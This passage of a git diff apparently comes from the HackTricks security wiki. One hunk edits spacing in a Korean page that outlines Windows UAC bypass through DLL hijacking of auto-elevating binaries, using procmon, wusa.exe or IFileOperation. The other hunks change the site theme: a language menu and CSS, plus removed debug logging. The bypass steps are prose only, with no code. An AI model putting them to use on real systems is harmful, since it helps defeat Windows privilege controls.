-**UACME**를 살펴보면 **대부분의 UAC 우회가 Dll Hijacking 취약점을 악용한다는 것을 알 수 있습니다** (주로 _C:\Windows\System32_에 악성 dll을 작성하는 방식). [Dll Hijacking 취약점을 찾는 방법을 배우려면 이 글을 읽으세요](../windows-local-privilege-escalation/dll-hijacking.md).
+**UACME**를 살펴보면 **대부분의 UAC 우회가 Dll Hijacking 취약점을 악용한다는 것을 알 수 있습니다**(주로 악성 dll을 _C:\Windows\System32_에 작성하는 방식). [Dll Hijacking 취약점을 찾는 방법을 배우려면 이 글을 읽으세요](../windows-local-privilege-escalation/dll-hijacking.md).
 
-1. **자동 상승**하는 이진 파일을 찾습니다 (실행 시 높은 무결성 수준에서 실행되는지 확인).
+1. **자동 상승**하는 이진 파일을 찾습니다(실행 시 높은 무결성 수준에서 실행되는지 확인).
 2. procmon을 사용하여 **DLL Hijacking**에 취약할 수 있는 "**NAME NOT FOUND**" 이벤트를 찾습니다.
 3. 아마도 **쓰기 권한이 없는** 일부 **보호된 경로**(예: C:\Windows\System32) 내에 DLL을 **작성**해야 할 것입니다. 이를 우회할 수 있는 방법은 다음과 같습니다:
-   1. **wusa.exe**: Windows 7, 8 및 8.1. CAB 파일의 내용을 보호된 경로 내에 추출할 수 있습니다 (이 도구는 높은 무결성 수준에서 실행되기 때문입니다).
+   1. **wusa.exe**: Windows 7, 8 및 8.1. CAB 파일의 내용을 보호된 경로 내에 추출할 수 있습니다(이 도구는 높은 무결성 수준에서 실행되기 때문입니다).
    2. **IFileOperation**: Windows 10.
 4. 보호된 경로 내에 DLL을 복사하고 취약하고 자동 상승된 이진 파일을 실행하는 **스크립트**를 준비합니다.
 
 ### 또 다른 UAC 우회 기술
 
-**자동 상승 이진 파일**이 **레지스트리**에서 **이진 파일** 또는 **명령**의 **이름/경로**를 **읽으려** 하는지 감시하는 것입니다 (이진 파일이 **HKCU** 내에서 이 정보를 검색하는 경우 더 흥미롭습니다). 
+**자동 상승 이진 파일**이 **레지스트리**에서 **이진 파일** 또는 **명령**의 **이름/경로**를 **읽으려** 하는지 감시하는 것입니다(이진 파일이 **HKCU** 내에서 이 정보를 검색하는 경우 더 흥미롭습니다). 
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/theme/book.js b/theme/book.js
index 1c8d77287..ccba50404 100644
--- a/theme/book.js
+++ b/theme/book.js
@@ -590,6 +590,61 @@ function playground_text(playground, hidden = true) {
     });
 })();
 
+
+(function menubarLanguage() {
+    var menubarLanguageToggleButton = document.getElementById('menubar-languages-toggle');
+    var menubarLanguagePopup = document.getElementById('menubar-languages-popup');
+    var languageButtons = menubarLanguagePopup.querySelectorAll('.menu-bar-link');
+
+    function showLanguage() {
+        menubarLanguagePopup.style.display = 'flex';
+        menubarLanguageToggleButton.setAttribute('aria-expanded', true);
+    }
+
+    function hideLanguage() {
+        menubarLanguagePopup.style.display = 'none';
+        menubarLanguageToggleButton.setAttribute('aria-expanded', false);
+        menubarLanguageToggleButton.focus();
+    }
+
+    menubarLanguageToggleButton.addEventListener('click', function () {
+        if (menubarLanguagePopup.style.display === 'flex') {
+            hideLanguage();
+        } else {
+            showLanguage();
+        }
+    });
+
+    menubarLanguagePopup.addEventListener('focusout', function(e) {
+        // e.relatedTarget is null in Safari and Firefox on macOS (see workaround below)
+        if (!!e.relatedTarget && !menubarLanguageToggleButton.contains(e.relatedTarget) && !menubarLanguagePopup.contains(e.relatedTarget)) {
+            hideLanguage();
+        }
+    });
+
+    // Should not be needed, but it works around an issue on macOS & iOS: https://github.com/rust-lang/mdBook/issues/628
+    document.addEventListener('click', function(e) {
+        if (menubarLanguagePopup.style.display === 'block' && !menubarLanguageToggleButton.contains(e.target) && !menubarLanguagePopup.contains(e.target)) {
+            hideLanguage();
+        }
+    });
+    
+    languageButtons.forEach((btn) => {
+        btn.addEventListener('click', function(e) {
+            const regex = /(?:(?:\/)+(?<lang>[a-z]{2}(?=\/|$)))?(?<path>(?:\/)*.*)?/g
+            var match = regex.exec(window.location.pathname)
+          
+            var path = match.groups.path
+            console.log(`Path: ${path} ${typeof path}`)
+          
+            const lang = match.groups.lang
+            console.log(`Lang: ${lang}`)
+            
+            window.location = `/${e.target.id}${path}${window.location.hash}`
+        });
+    })
+})();
+
 (function chapterNavigation() {
     document.addEventListener('keydown', function (e) {
         if (e.altKey || e.ctrlKey || e.metaKey || e.shiftKey) { return; }
diff --git a/theme/css/chrome.css b/theme/css/chrome.css
index 8cbda7c69..ead7ee881 100644
--- a/theme/css/chrome.css
+++ b/theme/css/chrome.css
@@ -83,6 +83,13 @@ body.sidebar-visible #menu-bar {
     }
 }
 
+.right-buttons .icons {
+    display: flex;
+    flex-direction: row;
+    flex-wrap: wrap;
+    column-gap: 0.5rem;
+}
+
 .icon-button {
     border: none;
     background: var(--bg);
@@ -139,10 +146,13 @@ body.sidebar-visible #menu-bar {
 
 /* Collapse Menu Popup */
 
+#menubar-collapse-toggle {
+    position: relative;
+}
 #menubar-collapse-popup {
     position: absolute;
-    right: 30px;
-    top: var(--menu-bar-height);
+    right: 0px;
+    top: 35px;
     z-index: 105;
     border-radius: 5px;
     font-size: 14px;
@@ -172,6 +182,44 @@ body.sidebar-visible #menu-bar {
     background-color: var(--theme-hover);
 }
 
+/* Languages Menu Popup */
+#menubar-languages-toggle {
+    position: relative;
+}
+
+#menubar-languages-popup {
+    position: absolute;
+    right: 0px;
+    top: 35px;
+    z-index: 105;
+    border-radius: 5px;
+    font-size: 14px;
+    color: var(--fg);
+    background: var(--bg);
+    border: 1px solid var(--table-border-color);
+    margin: 0;
+    padding: 0px;
+    display: none;
+    flex-direction: column;
+    max-height: 300px;
+    width: 150px;
+    overflow: scroll;
+}
+#menubar-languages-popup .menu-bar-link {
+    border: 0;
+    margin: 0;
+    padding: 8px 20px;
+    line-height: 25px;
+    white-space: nowrap;
+    text-align: start;
+    cursor: pointer;
+    color: inherit;
+    background: inherit;
+    font-size: inherit;
+}
+#menubar-languages-popup .menu-bar-link:hover {
+    background-color: var(--theme-hover);
+}
 
 .left-buttons {
     display: flex;
diff --git a/theme/index.hbs b/theme/index.hbs
index ecd2565f4..95c964391 100644
--- a/theme/index.hbs
+++ b/theme/index.hbs
@@ -144,34 +144,60 @@
 
                         <div class="right-buttons">
                             <div id="menubar-collapse">
-                            <a class="menu-bar-link" href="https://training.hacktricks.xyz" target="_blank">
-                                Hacktricks Training
-                            </a>
-                            <a class="menu-bar-link" href="https://twitter.com/hacktricks_live" target="_blank">
-                                Twitter
-                            </a>
-                            <a class="menu-bar-link" href="https://www.linkedin.com/company/hacktricks" target="_blank">
-                                Linkedin
-                            </a>
-                            <a class="menu-bar-link" href="https://github.com/sponsors/carlospolop" target="_blank">
-                                Sponsor
-                            </a>
-                            </div>
-                            <button id="menubar-collapse-toggle" class="icon-button" type="button" title="Toggle menu bar" aria-label="Toggle Menu bar" aria-expanded="false" aria-controls="collapse">
-                                <i class="fa fa-ellipsis-h"></i>
-                            </button>
-                            <div id="menubar-collapse-popup" class="menubar-collapse-popup" aria-label="Menu" role="menu">
-                                <a href="https://training.hacktricks.xyz" target="_blank" role="menuitem" class="menu-bar-link">Hacktricks Training</a>
-                                <a href="https://twitter.com/hacktricks_live" target="_blank" role="menuitem" class="menu-bar-link">Twitter</a>
-                                <a href="https://www.linkedin.com/company/hacktricks" target="_blank" role="menuitem" class="menu-bar-link">Linkedin</a>
-                                <a href="https://github.com/sponsors/carlospolop" target="_blank" role="menuitem" class="menu-bar-link">Sponsor</a>
+                                <a class="menu-bar-link" href="https://training.hacktricks.xyz" target="_blank">
+                                    Hacktricks Training
+                                </a>
+                                <a class="menu-bar-link" href="https://twitter.com/hacktricks_live" target="_blank">
+                                    Twitter
+                                </a>
+                                <a class="menu-bar-link" href="https://www.linkedin.com/company/hacktricks" target="_blank">
+                                    Linkedin
+                                </a>
+                                <a class="menu-bar-link" href="https://github.com/sponsors/carlospolop" target="_blank">
+                                    Sponsor
+                                </a>
                             </div>
+                            <div class="icons">
+                                <div id="menubar-collapse-toggle" class="icon-button" type="button" title="Toggle menu bar" aria-label="Toggle Menu bar" aria-expanded="false" aria-controls="collapse">
+                                    <i class="fa fa-ellipsis-h"></i>
+                                    <div id="menubar-collapse-popup" class="menubar-collapse-popup" aria-label="Menu" role="menu">
+                                        <a href="https://training.hacktricks.xyz" target="_blank" role="menuitem" class="menu-bar-link">Hacktricks Training</a>
+                                        <a href="https://twitter.com/hacktricks_live" target="_blank" role="menuitem" class="menu-bar-link">Twitter</a>
+                                        <a href="https://www.linkedin.com/company/hacktricks" target="_blank" role="menuitem" class="menu-bar-link">Linkedin</a>
+                                        <a href="https://github.com/sponsors/carlospolop" target="_blank" role="menuitem" class="menu-bar-link">Sponsor</a>
+                                    </div>
+                                </div>
 
-                            {{#if search_enabled}}
-                            <button id="search-toggle" class="icon-button" type="button" title="Search. (Shortkey: s)" aria-label="Toggle Searchbar" aria-expanded="false" aria-keyshortcuts="S" aria-controls="searchbar">
-                                <i class="fa fa-search"></i>
-                            </button>
-                            {{/if}}
+                                {{#if search_enabled}}
+                                <button id="search-toggle" class="icon-button" type="button" title="Search. (Shortkey: s)" aria-label="Toggle Searchbar" aria-expanded="false" aria-keyshortcuts="S" aria-controls="searchbar">
+                                    <i class="fa fa-search"></i>
+                                </button>
+                                {{/if}}
+
+                                <div id="menubar-languages-toggle" class="icon-button" type="button" title="Translations" aria-label="Toggle Tanslations" aria-expanded="false" aria-controls="translations">
+                                    <i class="fa fa-globe"></i>
+                                    
+                                    <div id="menubar-languages-popup" class="menubar-languages-popup" aria-label="Language menu" role="language menu">
+                                        <button id="en" role="menuitem" class="menu-bar-link">English</button>
+                                        <button id="es" role="menuitem" class="menu-bar-link">Spanish</button>
+                                        <button id="fr" role="menuitem" class="menu-bar-link">French</button>
+                                        <button id="de" role="menuitem" class="menu-bar-link">German</button>
+                                        <button id="el" role="menuitem" class="menu-bar-link">Greek</button>
+                                        <button id="hi" role="menuitem" class="menu-bar-link">Hindi</button>
+                                        <button id="it" role="menuitem" class="menu-bar-link">Italian</button>
+                                        <button id="ja" role="menuitem" class="menu-bar-link">Japanese</button>
+                                        <button id="ko" role="menuitem" class="menu-bar-link">Korean</button>
+                                        <button id="pl" role="menuitem" class="menu-bar-link">Polish</button>
+                                        <button id="pt" role="menuitem" class="menu-bar-link">Portuguese</button>
+                                        <button id="sr" role="menuitem" class="menu-bar-link">Serbian</button>
+                                        <button id="sw" role="menuitem" class="menu-bar-link">Swahili</button>
+                                        <button id="tr" role="menuitem" class="menu-bar-link">Turkish</button>
+                                        <button id="uk" role="menuitem" class="menu-bar-link">Ukrainian</button>
+                                        <button id="af" role="menuitem" class="menu-bar-link">Afrikaans</button>
+                                        <button id="zh" role="menuitem" class="menu-bar-link">Chinese</button>
+                                    </div>
+                                </div>
+                            </div>
 
                             {{#if print_enable}}
                             <a href="{{ path_to_root }}print.html" title="Print this book" aria-label="Print this book">
diff --git a/theme/sponsor.js b/theme/sponsor.js
index 65f157364..5b3f66804 100644
--- a/theme/sponsor.js
+++ b/theme/sponsor.js
@@ -19,13 +19,11 @@
     try {
       const response = await fetch(url, { method: "GET" })
       if (!response.ok) {
-        console.log(response)
         throw new Error(`Response status: ${response.status}`)
       }
 
       const json = await response.json()
       var sponsor = json.sponsor
-      console.log("boop", sponsor)
       sponsorImg.src = sponsor.image_url
       sponsorTitle.textContent = sponsor.name
       sponsorDescription.innerHTML = sponsor.description